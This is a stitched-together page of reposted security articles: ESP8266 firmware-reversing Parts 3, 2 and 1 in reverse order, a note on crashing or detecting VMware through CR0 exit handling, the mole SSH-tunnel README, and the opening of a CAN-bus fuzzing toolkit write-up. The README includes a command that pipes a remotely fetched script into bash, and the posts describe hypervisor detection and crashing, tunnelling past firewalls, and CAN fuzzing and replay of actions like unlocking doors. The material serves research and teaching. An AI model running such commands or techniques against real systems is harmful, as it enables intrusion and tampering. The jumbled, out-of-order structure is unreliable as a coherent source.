Reversing ESP8266 Firmware (Part 3)

( original text by @boredpentester )

What is it?

So, what is the ESP8266? Wikipedia describes it as follows:

The ESP8266 is a low-cost Wi-Fi microchip with full TCP/IP stack and microcontroller capability produced by Shanghai-based Chinese manufacturer, Espressif Systems.

Moreover, Wikipedia alludes to the processor specifics:

Processor: L106 32-bit RISC microprocessor core based on the Tensilica Xtensa Diamond Standard 106Micro running at 80 MHz”

At present, my version of IDA does not recognise this processor, but looking up “IDA Xtensa” unveils a processor module to support the instruction set, which is described as follows:

This is a processor plugin for IDA, to support the Xtensa core found in Espressif ESP8266.

With the above information, we’ve also answered our second question of “What is the processor?“.

Understanding the firmware format

Now that IDA can understand the instruction set of the processor, it’s time to learn how firmware images are comprised in terms of format, data and code. Indeed, what is the format of our firmware image?. To help answer this question, my first point of call was to analyse existing open source tools published by Expressif, in order to work with the ESP8266.

This leads us to ESPTool, an application written in Python capable of displaying some information about binary firmware images, amongst other things.

The manual for this tool also gives away some important information:

The elf2image command converts an ELF file (from compiler/linker output) into the binary executable images which can be flashed and then booted into.

From this, we can determine that compiled images, prior to their transformation into firmware, exist in the ELF-32 Xtensa format. This will be useful later on.

Moving back to the other features of ESPTool, we see it’s indeed able to present information about our firmware image:

1
2
3
4
5
6
7
josh@ioteeth:/tmp/reversing$ ~/esptool/esptool.py image_info recovered_file
esptool.py v2.4.0-dev
Image version: 1
Entry point: 4010f29c
1 segments
Segment 1: len 0x00568 load 0x4010f000 file_offs 0x00000008
Checksum: 2d (valid)

Clearly, this application understands the format of an image, so let’s take it apart and see how it works.

Browsing through the code, we come across:

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Memory addresses
IROM_MAP_START = 0x40200000
IROM_MAP_END = 0x40300000
[...]
class ESPFirmwareImage(BaseFirmwareImage):
    """ 'Version 1' firmware image, segments loaded directly by the ROM bootloader. """
    ROM_LOADER = ESP8266ROM
    def __init__(self, load_file=None):
        super(ESPFirmwareImage, self).__init__()
        self.flash_mode = 0
        self.flash_size_freq = 0
        self.version = 1
        if load_file is not None:
            segments = self.load_common_header(load_file, ESPLoader.ESP_IMAGE_MAGIC)
            for _ in range(segments):
                self.load_segment(load_file)
            self.checksum = self.read_checksum(load_file)
[...]
class BaseFirmwareImage(object):
    SEG_HEADER_LEN = 8
    """ Base class with common firmware image functions """
    def __init__(self):
        self.segments = []
        self.entrypoint = 0
    def load_common_header(self, load_file, expected_magic):
            (magic, segments, self.flash_mode, self.flash_size_freq, self.entrypoint) = struct.unpack('<BBBBI', load_file.read(8))
            if magic != expected_magic or segments > 16:
                raise FatalError('Invalid firmware image magic=%d segments=%d' % (magic, segments))
            return segments
    def load_segment(self, f, is_irom_segment=False):
        """ Load the next segment from the image file """
        file_offs = f.tell()
        (offset, size) = struct.unpack('<II', f.read(8))
        self.warn_if_unusual_segment(offset, size, is_irom_segment)
        segment_data = f.read(size)
        if len(segment_data) < size:
            raise FatalError('End of file reading segment 0x%x, length %d (actual length %d)' % (offset, size, len(segment_data)))
        segment = ImageSegment(offset, segment_data, file_offs)
        self.segments.append(segment)
        return segment

All of the above code is notable. It allows us to discern the structure of the firmware image.

The function load_common_header() details the following format:

1
(magic, segments, self.flash_mode, self.flash_size_freq, self.entrypoint) = struct.unpack('<BBBBI', load_file.read(8))

Which represented as a structure would look like this:

1
2
3
4
5
6
7
typedef struct {
    uint8 magic;
    uint8 sect_count;
    uint8 flash_mode;
    uint8 flash_size_freq;
    uint32 entry_addr;
} rom_header;

We can see from the function load_segment() that following our image header are the image segment headers, followed immediately by the segment data itself, for each segment.

The following code parses a segment header:

1
(offset, size) = struct.unpack('<II', f.read(8))

Which again, represented as a structure would be as follows:

1
2
3
4
typedef struct {
    uint32 seg_addr;
    uint32 seg_size;
} segment_header;

This is helpful, we now know both the format of the firmware image and a number of the tools available to process such images. It’s worth noting that we haven’t considered elements such as checksums, but these aren’t important to us as we don’t intend on patching the firmware image.

Whilst a tangent, it’s worth noting that whilst in this case, our format has been documented and tools exist to parse such formats, often this is not the case. In such cases, I’d advise obtaining as many firmware images as you can from your target devices. At that point, a starting point could be to find commonalities between them, which could indicate what certain bytes mean within the format. Also of use would be to understand how an image is booted into, as the bootloader may act differently depending on certain values at fixed offsets.

Understanding the boot process

So, onto our next question, what is the boot process of the device? Understanding this is important as it will help to clarify our understanding of the image. Richard Aburton has very helpfully reverse engineered the boot loader and described the following key point:

It finds the flash address of the rom to boot. Rom 1 is always at 0×1000 (next sector after boot loader). Rom 2 is half the chip size + 0×1000 (unless the chip is above a 1mb when it’s position it kept down to to 0×81000).

Checking the 0×1000 offset within our firmware image, there is indeed a second image, as denoted by presence of the image magic signature (0xE9):

01
02
03
04
05
06
07
08
09
10
11
josh@ioteeth:/tmp/reversing$ hexdump -s 0x1000 -v -C recovered_file | head
00001000  e9 04 00 00 30 64 10 40  10 10 20 40 c0 ed 03 00  |....0d.@.. @....|
00001010  43 03 ab 83 1c 00 00 60  00 00 00 60 1c 0f 00 60  |C......`...`...`|
00001020  00 0f 00 60 41 fc ff 20  20 74 c0 20 00 32 24 00  |...`A..  t. .2$.|
00001030  30 30 75 56 33 ff 31 f8  ff 66 92 08 42 a0 0d c0  |00uV3.1..f..B...|
00001040  20 00 42 63 00 51 f5 ff  c0 20 00 29 03 42 a0 7d  | .Bc.Q... .).B.}|
00001050  c0 20 00 38 05 30 30 75  37 34 f4 31 f1 ff 66 92  |. .8.00u74.1..f.|
00001060  06 0c d4 c0 20 00 49 03  c0 20 00 29 03 0d f0 00  |.... .I.. .)....|
00001070  b0 ff ff 3f 24 10 20 40  00 ed fe 3f 80 6e 10 40  |...?$. @...?.n.@|
00001080  04 ed fe 3f 79 6e 10 40  fc ec fe 3f f8 ec fe 3f  |...?yn.@...?...?|
00001090  6b 6e 10 40 61 6e 10 40  f6 ec fe 3f 52 6e 10 40  |kn.@an.@...?Rn.@|

This second firmware image sits almost immediately after the padding bytes we observed earlier. Based on the format, we can see from the second byte (0×04) that this ROM has 4 segments and is likely to be user or custom ROM code, with the first ROM image potentially being the bootloader of the device, responsible for bootstrapping.

Whilst there are a lot of nuances to the boot process, the above is all we really need to be aware of at this time.

Understanding the physical memory layout

Next, understanding the physical memory layout will help us to differentiate between data and code segments, assuming consistency between images. Whilst not entirely accurate, the physical memory layout of the ESP8266 has been documented.

From the information within, we can conclude the following:

  • 0×40100000 – Instruction RAM. Used by bootloader to load SPI Flash <40000h.
  • 0x3FFE8000 – User data RAM. Available to applications.
  • 0x3FFFFFFF – Anything below this address appears to be data, not code
  • 0×40100000 – Anything above this address appears to be code, not data

Anything that doesn’t match an address exactly, we’ll mark as unknown and classify as either code or data based on the rules above.

It should be noted that simply loading the file as ‘binary’ within IDA, having set the appropriate processor, allows for limited understanding and doesn’t display any xrefs to strings that could guide our efforts:

With this in mind, we can write a simple loader for IDA to identify the firmware image and load the segments accordingly, which should yield better results. We’ll use the memory map above as a guide to name the segments and mark them as code or data accordingly.

Reversing ESP8266 Firmware (Part 2)

( original text by @boredpentester )

Initial analysis

As with any unknown binary, our initial analysis will help to uncover any strings that may allude to what we’re looking at, as well as any signatures within the file that could present a point of further analysis. Lastly, we want to look at the hexadecimal representation of the file, in order to identify padding or other blocks of interest.

File output:

1
recovered_file: , code offset 0x1+3, Bytes/sector 26688, sectors/cluster 5, FATs 16, root entries 16, sectors 20480 (volumes &lt;=32 MB), Media descriptor 0xf5, sectors/FAT 16400, sectors/track 19228, FAT (12 bit by descriptor)

BinWalk output:

01
02
03
04
05
06
07
08
09
10
11
josh@ioteeth:/tmp/reversing$ binwalk -v recovered_file
Scan Time:     2018-05-24 11:51:24
Target File:   /tmp/reversing/recovered_file
MD5 Checksum:  7e11dd07846ecfe2502df7ad0c75952a
Signatures:    344
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
251942        0x3D826         Unix path: /tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
292925        0x4783D         Unix path: /tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/cores/esp8266/abi.cpp

We can see from the output above that we’re potentially looking at an ESP8266 firmware image. I’ll disregard the results of file as they’re clearly a false positive, based on the challenge pre-text.

Strings output:

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
[...]
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
_pos &lt;= _streamPos
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
cb == stream_rem
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
_pos + size &lt;= _size
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
_buffer
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
_pos &lt;= _streamPos
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
cb == stream_rem
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
_pos + size &lt;= _size
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
_send_waiting == 0
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/ClientContext.h
_datasource == nullptr
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/ClientContext.h
_connect_pending
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/ClientContext.h
pcb == _pcb
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/ClientContext.h
buffer == _data + _pos
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
_pos + size &lt;= _size
/tmp/esp8266/arduino-1.8.5/hardware/esp8266com/esp8266/libraries/ESP8266WiFi/src/include/DataSource.h
[...]
 AConnecting to
WiFi connected
IP address:
Port knocking failed
/get_secrets
Requesting URL:
GET
 HTTP/1.1
Host:
Connection: close
&gt;&gt;&gt; Client Timeout !
closing connection
services.ioteeth.com
AjT32156
PCSL_GUEST

Based on the strings above, in particular:

1
2
IP address:
Port knocking failed

It would appear our firmware is potentially performing a form of port knocking, before connecting to services.ioteeth.com to retrieve the aforementioned secrets. Port knocking is a means of instructing a firewall to open a predefined TCP/UDP port if the correct sequence of ports are ‘knocked’ on, which is usually performed via sending a TCP SYN packet to the required ports. The firewall would recognise the sequence and permit access to the defined resources.

We can perform a fast port scan to check for any filtered ports across a limited number of popular ports:

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
josh@ioteeth:/tmp$ nmap -n -PN -F -v services.ioteeth.com -oN services.ioteeth.com.out
Warning: The -PN option is deprecated. Please use -Pn
Starting Nmap 7.40 ( https://nmap.org ) at 2018-05-25 11:29 BST
Initiating Connect Scan at 11:29
Scanning services.ioteeth.com (192.168.1.69) [100 ports]
Discovered open port 22/tcp on 192.168.1.69
Completed Connect Scan at 11:29, 1.20s elapsed (100 total ports)
Nmap scan report for services.ioteeth.com (192.168.1.69)
Host is up (0.00059s latency).
Not shown: 98 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
445/tcp filtered microsoft-ds
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.23 seconds

We can see that port 445 is filtered, so this could be our target port and equally, this would explain why the service couldn’t be reached by the originator of this challenge. It’s also possible another port is the one being used to obtain/upload secrets and ultimately, we’ll find that port through investigation, we note this however as a passive observation.

Continuing with our analysis, let’s take a look at the hexdump of our firmware image:

01
02
03
04
05
06
07
08
09
10
11
josh@ioteeth:/tmp/reversing$ hexdump -v -C recovered_file | head
00000000  e9 01 00 00 9c f2 10 40  00 f0 10 40 68 05 00 00  |.......@...@h...|
00000010  10 10 00 00 50 f5 10 40  1c 4b 00 40 cc 24 00 40  |....P..@.K.@.$.@|
00000020  ff ff ff 3f ff ff 0f 40  ff 7f 10 40 ff ff ff 5f  |...?...@...@..._|
00000030  f0 ff ff 3f 00 10 00 00  1c e2 00 40 00 4a 00 40  |...?.......@.J.@|
00000040  4c 4a 00 40 00 07 00 60  00 00 00 80 e8 2b 00 40  |LJ.@...`.....+.@|
00000050  f0 30 00 40 a0 2f 00 40  b7 1d c1 04 00 12 00 60  |.0.@./.@.......`|
00000060  00 10 00 eb 7c 12 00 60  12 c1 d0 09 b1 f9 a1 fd  |....|..`........|
00000070  01 29 4f 38 4f 21 e6 ff  2a 23 4b 3f 0c 44 01 e6  |.)O8O!..*#K?.D..|
00000080  ff c0 00 00 8c 52 0c 12  86 07 00 00 00 21 e1 ff  |.....R.......!..|
00000090  29 0f 28 0f 28 02 29 2f  28 0f 28 12 29 3f 38 1f  |).(.(.)/(.(.)?8.|

We also note that further into the file is what appears to be padding, followed by more data:

01
02
03
04
05
06
07
08
09
10
11
12
13
00000570  68 f5 10 40 00 00 00 00  00 00 00 00 00 00 00 2d  |h..@...........-|
00000580  aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa  |................|
00000590  aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa  |................|
000005a0  aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa  |................|
000005b0  aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa  |................|
[...]
00000fd0  aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa  |................|
00000fe0  aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa  |................|
00000ff0  aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa  |................|
00001000  e9 04 00 00 30 64 10 40  10 10 20 40 c0 ed 03 00  |....0d.@.. @....|
00001010  43 03 ab 83 1c 00 00 60  00 00 00 60 1c 0f 00 60  |C......`...`...`|
00001020  00 0f 00 60 41 fc ff 20  20 74 c0 20 00 32 24 00  |...`A..  t. .2$.|
00001030  30 30 75 56 33 ff 31 f8  ff 66 92 08 42 a0 0d c0  |00uV3.1..f..B...|

This padding is potentially useful, as it could be indicative of multiple files or formats being present within our target firmware image.

At this point, we have a number of questions we need to answer before we can continue. We can theorise that our long-term goal, based on the strings observed within the file, is to uncover the port knocking sequence performed by the firmware, which will hopefully allow us to access the external service that’s communicated with. But how do we go about doing that?

It’s worth noting that IDA doesn’t recognise our file, so let’s pause and do some research first.

Questions we need to answer

As with any firmware image, a good starting point prior to reverse engineering is to understand the following:

  • What is the device in question?
  • What processor does it operate on?
  • What is the format of the firmware image in question?
  • What tools exist to process the type of firmware image we have, if any?
  • What is the boot process of the device?
  • What does the physical memory layout look like?

Throughout the course of this section, we’ll work towards learning the answers to the above and understanding how they can help us.

Our penultimate goal will be to load the firmware into IDA for analysis, in a way that allows us to make some sense of what’s happening.

Reversing ESP8266 Firmware (Part 1)

( original text by @boredpentester )

During my time with Cisco Portcullis, I wanted to learn more about reverse engineering embedded device firmware.

This six-part series was written both during my time with Cisco Portcullis, as well in my spare time (if the tagline of this blog didn’t give that away). This series intends to detail my analysis of an embedded device’s firmware, in this case, the ESP8266’s, present a methodology for analysing firmware more generally and of course, solve the challenge presented. It will be one of many series with a focus on firmware reverse engineering and security assessment of ‘smart’ devices.

We will cover the initial analysis, writing an IDA loader and recovering function symbols (names) via IDA’s FLAIR tools. Finally, we’ll reverse engineer the functionality required to solve the challenge, for extra points, without reliance upon string references.

I chose an ESP8266 firmware image supplied by a colleague as a contrived reversing challenge.  Mainly because this target made a good starting point due to the simplicity of the firmware format.

The challenge was described as follows:

We managed to obtain the firmware of an unknown device connected to our wireless access point. We’ve been told it’s connecting to a service and retrieving secrets, but we can’t reach the service. Can you?

Update: You can find the a slightly modified version of the supplied binary here (within the zip archive).

This series has been broken down into the following parts:

  • Part 1:
    • Introduction (you’re here now)
  • Part 2:
    • Initial analysis
    • Questions we need to answer
  • Part 3:
    • What is it?
    • Understanding the firmware format
    • Understanding the boot process
    • Understanding the physical memory layout
  • Part 4:
    • Writing an IDA loader
    • Performing library recognition
    • Fixing IDB2PAT
    • Generating our pattern file
  • Part 5:
    • Recognising VTABLE’s
    • Finding the port knock sequence
    • Understanding the Xtensa instruction set
    • Understanding the Xtensa calling convention
  • Part 6:
    • Reversing the loop function
    • Getting the secrets!
    • Conclusion
    • References
    • Tools
    • Feedback

Control Register Access Exiting and Crashing VMware

( origin text  from https://howtohypervise.blogspot.com )

Coinciding with my previous two posts, here’s how you can crash or at least detect VMware and many other hypervisors:
https://gist.github.com/drew1ind/d31840bebbbb1ff1d112a6f46e162c05Backstory:
When I was writing a simple SEH emulator (following the documentation on msdn as well as this excellent blogpost) for my hypervisor, I was testing under VMware.

When trying to execute that, I found that VMware would instantly close without any message. After being stumped for a while, I tried on my PC only to find that my SEH emulator did, in fact, work.
When I talked about it with my friend daax (whose blog can be found over at https://revers.engineering/), he recalled experiencing the exact same issue (albeit with different motivations): when he tried to unset CR0.pe to cause a #GP(0), VMware would just close on him. This eventually drove me to the conclusion that VMware was improperly handling the CR access VM exit for CR0, or more specifically, they don’t check that cr0.pg is already enabled, which would normally cause a #GP(0). Since they write the invalid value into the guest CR0 VMCS field, the processor objects upon VM entry in the form of a VM entry failure, which VMware responds to by just closing itself.
Additional checks in that gist linked above rely on hypervisors not properly emulating CPU behaviour, which includes:
  • Injecting an exception upon updating bits of CR0 required to be a certain value by the CPU for VMX operation or just not updating them at all
  • Not injecting a fault when the guest attempts to set a reserved bit of CR0, which can result in either VM entry failure or a triple fault due to repeated #GP(0)s
  • Updating the state of CR0 even though the write caused a #GP(0)
Fixes for such include:
  • Always checking if a change is valid before changing any CPU state
  • For control register bits that are documented, if they are changed, the hypervisor should ensure that the processor supports the bit and if the processor would inject an exception if the bit was changed (i.e with the VMware example, they should check if CR0.pg is set, and if it is, declare the change as invalid)
  • Control register bits that are forced to be a fixed value should be host owned bits which values only change in the read shadow
  • Control register bits which don’t exist at the time of writing the hypervisor should never be allowed to change — this also means that the hypervisor *must* control CPUID responses to remove reserved bits from responses, as well as reserved leafs

Easily create SSH tunnels.

Github — mole is maintained by davrodpin.

Mole is a cli application to create ssh tunnels, forwarding a local port to a remote address through a ssh server.

$ mole -remote :3306 -server my-database-server
INFO[0000] listening on local address                    local_address="127.0.0.1:51082"

Highlighted Features

  • Auto local address selection: find a port available and start listening to it, so the -local flag doesn’t need to be given every time you run the app.
  • Aliases: save your tunnel settings under an alias, so it can be reused later.
  • Leverage the SSH Config File: use some options (e.g. user name, identity key and port), specified in $HOME/.ssh/config whenever possible, so there is no need to have the same SSH server configuration in multiple places.

Table of Contents

Use Cases

…or why on Earth would I need something like this?

Access a computer or service behind a firewall

Mole can help you to access computers and services outside the perimeter network that are blocked by a firewall, as long as the user has ssh access to a computer with access to the target computer or service.

+----------+          +----------+          +----------+
|          |          |          |          |          |
|          |          | Firewall |          |          |
|          |          |          |          |          |
|  Local   |  tunnel  +----------+  tunnel  |          |
| Computer |--------------------------------|  Server  |
|          |          +----------+          |          |
|          |          |          |          |          |
|          |          | Firewall |          |          |
|          |          |          |          |          |
+----------+          +----------+          +----------+
                                                 |
                                                 |
                                                 | tunnel
                                                 |
                                                 |
                                            +----------+
                                            |          |
                                            |          |
                                            |          |
                                            |          |
                                            |  Remote  |
                                            | Computer |
                                            |          |
                                            |          |
                                            |          |
                                            +----------+

NOTE: Server and Remote Computer could potentially be the same machine.

Access a service that is listening only on a local address

$ mole \
  -local 127.0.0.1:3306 \
  -remote 127.0.0.1:3306 \
  -server example@172.17.0.100
+-------------------+             +--------------------+
| Local Computer    |             | Remote / Server    |
|                   |             |                    |
|                   |             |                    |
| (172.17.0.10:     |    tunnel   |                    |
|        50001)     |-------------| (172.17.0.100:22)  |
|  tunnel client    |             |  tunnel server     |
|       |           |             |         |          |
|       | port      |             |         | port     |
|       | forward   |             |         | forward  |
|       |           |             |         |          |
| (127.0.0.1:3306)  |             | (127.0.0.1:50000)  |
|  local address    |             |         |          |
|                   |             |         | local    |
|                   |             |         | conn.    |
|                   |             |         |          |
|                   |             | (127.0.0.1:3306)   |
|                   |             |  remote address    |
|                   |             |      +----+        |
|                   |             |      | DB |        |
|                   |             |      +----+        |
+-------------------+             +--------------------+

NOTE: Server and Remote Computer could potentially be the same machine.

Installation

bash <(curl -fsSL https://raw.githubusercontent.com/davrodpin/mole/master/tools/install.sh)

or if you prefer install it through Homebrew

brew tap davrodpin/homebrew-mole && brew install mole

Usage

$ mole -help
usage:
  mole [-v] [-local [<host>]:<port>] -remote [<host>]:<port> -server [<user>@]<host>[:<port>] [-key <key_path>]
  mole -alias <alias_name> [-v] [-local [<host>]:<port>] -remote [<host>]:<port> -server [<user>@]<host>[:<port>] [-key <key_path>]
  mole -alias <alias_name> -delete
  mole -start <alias_name>
  mole -aliases
  mole -help
  mole -version

  -alias string
        Create a tunnel alias
  -aliases
        list all aliases
  -delete
        delete a tunnel alias (must be used with -alias)
  -help
        list all options available
  -key string
        (optional) Set server authentication key file path
  -local value
        (optional) Set local endpoint address: [<host>]:<port>
  -remote value
        set remote endpoint address: [<host>]:<port>
  -server value
        set server address: [<user>@]<host>[:<port>]
  -start string
        Start a tunnel using a given alias
  -v    (optional) Increase log verbosity
  -version
        display the mole version

Examples

Provide all supported options

$ mole -v -local 127.0.0.1:8080 -remote 172.17.0.100:80 -server user@example.com:22 -key ~/.ssh/id_rsa
DEBU[0000] cli options                                   key=/home/mole/.ssh/id_rsa local="127.0.0.1:8080" remote="172.17.0.100:80" server="user@example.com:22" v=true
DEBU[0000] using ssh config file from: /home/mole/.ssh/config
DEBU[0000] server: [name=example.com, address=example.com:22, user=user, key=/home/mole/.ssh/id_rsa]
DEBU[0000] tunnel: [local:127.0.0.1:8080, server:example.com:22, remote:172.17.0.100:80]
INFO[0000] listening on local address                    local_address="127.0.0.1:8080"

Use the ssh config file to lookup a given server host

$ cat $HOME/.ssh/config
Host example1
  Hostname 10.0.0.12
  Port 2222
  User user
  IdentityFile ~/.ssh/id_rsa
$ mole -v -local 127.0.0.1:8080 -remote 172.17.0.100:80 -server example1
DEBU[0000] cli options                                   key= local="127.0.0.1:8080" remote="172.17.0.100:80" server=example1 v=true
DEBU[0000] using ssh config file from: /home/mole/.ssh/config
DEBU[0000] server: [name=example1, address=10.0.0.12:2222, user=user, key=/home/mole/.ssh/id_rsa]
DEBU[0000] tunnel: [local:127.0.0.1:8080, server:10.0.0.12:2222, remote:172.17.0.100:80]
INFO[0000] listening on local address                    local_address="127.0.0.1:8080"

Let mole to randomly select the local endpoint

$ mole -remote 172.17.0.100:80 -server example1
INFO[0000] listening on local address                    local_address="127.0.0.1:61305"

Bind the local address to 127.0.0.1 by specifying only the local port

$ mole -v -local :8080 -remote 172.17.0.100:80 -server example1
DEBU[0000] cli options                                   key= local="127.0.0.1:8080" remote="172.17.0.100:80" server=example1 v=true
DEBU[0000] using ssh config file from: /home/mole/.ssh/config
DEBU[0000] server: [name=example1, address=10.0.0.12:2222, user=user, key=/home/mole/.ssh/id_rsa]
DEBU[0000] tunnel: [local:127.0.0.1:8080, server:10.0.0.12:2222, remote:172.17.0.100:80]
INFO[0000] listening on local address                    local_address="127.0.0.1:8080"

Connect to a remote service that is running on 127.0.0.1 by specifying only the remote port

$ mole -v -local 127.0.0.1:8080 -remote :80 -server example1
DEBU[0000] cli options                                   key= local="127.0.0.1:8080" remote="127.0.0.1:80" server=example1 v=true
DEBU[0000] using ssh config file from: /home/mole/.ssh/config
DEBU[0000] server: [name=example1, address=10.0.0.12:2222, user=user, key=/home/mole/.ssh/id_rsa]
DEBU[0000] tunnel: [local:127.0.0.1:8080, server:10.0.0.12:2222, remote:127.0.0.1:80]
INFO[0000] listening on local address                    local_address="127.0.0.1:8080"

Create an alias, so there is no need to remember the tunnel settings afterwards

$ mole -alias example1 -v -local :8443 -remote :443 -server user@example.com
$ mole -start example1
DEBU[0000] cli options                                   options="[local=:8443, remote=:443, server=user@example.com, key=, verbose=true, help=false, version=false]"
DEBU[0000] using ssh config file from: /home/mole/.ssh/config
DEBU[0000] server: [name=example.com, address=example.com:22, user=user, key=/home/mole/.ssh/id_rsa]
DEBU[0000] tunnel: [local:127.0.0.1:8443, server:example.com:22, remote:127.0.0.1:443]
INFO[0000] listening on local address                    local_address="127.0.0.1:8443"

A SECURITY ANALYSIS TOOLKIT FOR PROPRIETARY CAR PROTOCOLS CANALYZAT0R

Disclaimer: The elaboration and software project associated to this subject are results of a Bachelor’s thesis created at SCHUTZWERK in collaboration with Aalen University by Philipp Schmied.

While car manufacturers steadily refine and advance vehicle systems, requirements of the underlying networks increase even further. Striving for smart cars, a fast-growing amount of components are interconnected within a single car. This results in specialized and often proprietary car protocols built based on standardized technology. Most of these protocols are based on bus protocols: All network nodes within such a bus network are connected using a single shared data link. This technology provides a feasible way of real time communication between several security and comfort systems. However, often no or insufficient authentication and encryption or other security mechanisms can be found in today’s car systems. As described previously, most of the interchanged data structures on a car network bus, including associated systems, are proprietary. For this reason, there’s a need for open source, extensible, easy to use and publicly available software to analyze the security state of such networks and protocols.

CAN BUS

Starting from mid-1980, the CAN bus is being implemented into vehicles. Still to this day, many components and proprietary protocols rely on the CAN bus. While analyzing today’s car protocols, we focused on this technology – however, there exist multiple additional technologies like FlexRay and automotive Ethernet which will most likely gain an increased relevance and also need to be analyzed in the future.

CAN network packets are defined by the associated packet format, which looks as follows [1]:

CAN packet format

  • Arbitration ID: Describes the meaning of the data segments
  • Control: Flags to manage packet transport
  • Data: Payload of the packet with up to eight bytes of data
  • CRC: Checksum

A general goal of analyzing car protocols is to reverse engineer the CAN matrix. This data structure maps CAN arbitration IDs and corresponding payloads to specific actions. An example for this is the identification of a CAN packet which controls the acceleration of a vehicle.

Depending on intended goals, the CAN bus can be accessed in two ways:

  1. OBD-II interface: Since 2004, this diagnostic interface is mandatory for each car in the European Union. Most of the time, this port can be accessed from the driver’s seat. Inbound packets can and most likely will be filtered by the diagnostic gateway, so fuzzing from this interface can be of limited success rate.
  2. Interacting with bus wires: It’s possible to directly splice analysis hardware into a CAN bus. This way, filtering can be circumvented and otherwise isolated bus segments can be analyzed.

INTRODUCING THE CANALYZAT0R

This Python software project is built from scratch with new ideas for analysis mechanisms. It’s released on GitHub and bundles many features of other other CAN tools in one place. Also, it’s GUI based and organized with one tab per specific analysis task:

CANalyzat0r: Main tab

Most of the existing open source CAN analysis software makes use of SocketCAN. This consists of a bundle of kernel modules that abstract CAN communication in such a way that CAN interfaces can be used similarly to conventional network interfaces on the Linux operating system. So does CANalyzat0r, including many additional features:

  • Manage interface configuration (automatically load kernel modules, manage physical and virtual SocketCAN devices)
  • Multi interface support: Sniff while sending data on a separate SocketCAN interface
  • Manage your work in projects. You can also import and export them in human readable/editable JSON format and track data using a version control system.
  • Transparent logging
  • Graphical sniffing
  • Manage findings, dumps and known packets per project:
CANalyzat0r: Manage known packets per project
  • Easy copy and paste between CANalyzat0r modules. Also, it’s possible to paste text based SocketCAN files directly into the GUI to import existing packet dumps:
CANalyzat0r: Pasting packets
  • Threaded Sending, Fuzzing and Sniffing
  • Ignore packets when sniffing — Automatically filter unique packets by ID or data and ID
  • Compare dumps
  • Allows setting up complex setups using only one window
  • Clean organization in tabs for each analysis task
  • Advanced packet filtering using an interactive packet replay approach
  • Search for action specific packets using background noise filtering
  • SQLite support
  • PDF and HTML code documentation

CANalyzat0r is modular and extensible – using the provided documentation it’s possible to implement new features which integrate into the existing GUI and work flow.

USAGE EXAMPLES

SIMULTANEOUS SNIFFING AND FUZZING

In order to analyze functionalities of proprietary car components, fuzzing mostly acts as a starting point. Using this approach, CAN nodes can be examined to uncover potential security risks. The CANalyzat0r can be used to quickly setup an efficient fuzzing environment:

CANalyzat0r: Integrated fuzzer and sniffer
  1. Connect the CANalyzat0r to the CAN node via SocketCAN and the desired bit rate.
  2. In the fuzzer tab, choose the desired options: For example, it’s possible to define a fuzzing mask and a desired packet length range which will be applied to all randomly generated CAN packets:
Resulting payload Payload mask Length minimum Length maximum
12 AA 34 56 BB 13 XX AA XX XX BB 13 XX XX 0 6
XX AA XX XX BB 13 XX XX 0 6
12 AA 34 88 XX AA XX XX BB 13 37 DD 2 4

Also, CAN Arbitration IDs can be fixed while payloads remain variable. Here’s an example:

Resulting CAN ID ID mask Fuzzing mode
BA4 XAX User defined
832 XXX User defined
563 11 bit IDs

While random packets are being generated and sent over the CAN bus, it’s possible to use the sniffer tab to trace answer packets. Sniffed packet dumps can be saved, replayed or filtered in further steps.

SEMI-AUTOMATED PACKET FILTERING

To exploit and check for packet replay vulnerabilities, it’s often necessary to capture packet dumps while executing a certain task on a car, for example unlocking the doors using the remote control. Once such a packet dump that causes a CAN node to execute the desired task has been captured, it’s mostly desired to minimize such a set of packets. To gain the desired effect on a car’s component, it’s not required to replay thousands of packets every time. In fact, desired actions can usually be performed using only a few particular CAN packets.

For this task, the filtering tab of the CANalyzat0r can be used:

CANalyzat0r: Filtering packets
  1. Capture “noise” packets: While the desired action is not being executed by the CAN component, packets that pass the bus will be captured. These packets will be useful in further analysis steps.
  2. Record an arbitrary amount of packet sets while executing the task once per packet set.
